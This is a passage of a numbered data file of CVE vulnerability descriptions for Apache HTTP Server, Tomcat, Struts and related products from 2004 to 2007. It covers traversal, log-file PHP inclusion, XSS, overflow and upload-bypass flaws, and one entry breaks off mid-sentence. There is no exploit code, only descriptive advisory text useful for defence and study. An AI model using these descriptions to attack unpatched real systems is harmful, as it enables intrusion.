13436| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
13437| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
13438| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
13439| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
13440| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
13441| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
13442| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
13443| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13444| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
13445| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
13446| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
13447| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
13448| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13449| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
13450| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
13451| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
13452| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
13453| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
13454| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
13455| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
13456| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
13457| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
13458| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
13459| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
13460| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
13461| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
13462| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13463| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13464| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
13465| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
13466| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
13467| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
13468| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
13469| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
13470| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
13471| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13472| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
13473| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
13474| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
13475| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
13476| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
13477| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13478| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
13479| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13480| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
13481| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
13482| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13483| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
13484| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
13485| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
13486| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
13487| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
13488| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
13489| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
13490| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
13491| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13492| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
13493| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
13494| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
13495| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
13496| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
13497| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
13498| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
13499| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
13500| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
13501| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
13502| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
13503| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
13504| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
13505| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
13506| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
13507| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
13508| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
13509| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
13510| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
13511| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
13512| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
13513| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13514| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13515| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
13516| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
13517| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
13518| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
13519| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
13520| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
13521| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
13522| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
13523| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
13524| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
13525| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
13526| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
13527| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
13528| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
13529| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
13530| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
13531| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
13532| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
13533| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
13534| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
13535| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
13536| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
13537| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
13538| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13539| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13540| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13541| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
13542| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
13543| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
13544| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
13545| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
13546| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
13547| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
13548| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
13549| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
13550| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
13551| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
13552| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
13553| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
13554| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
13555| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
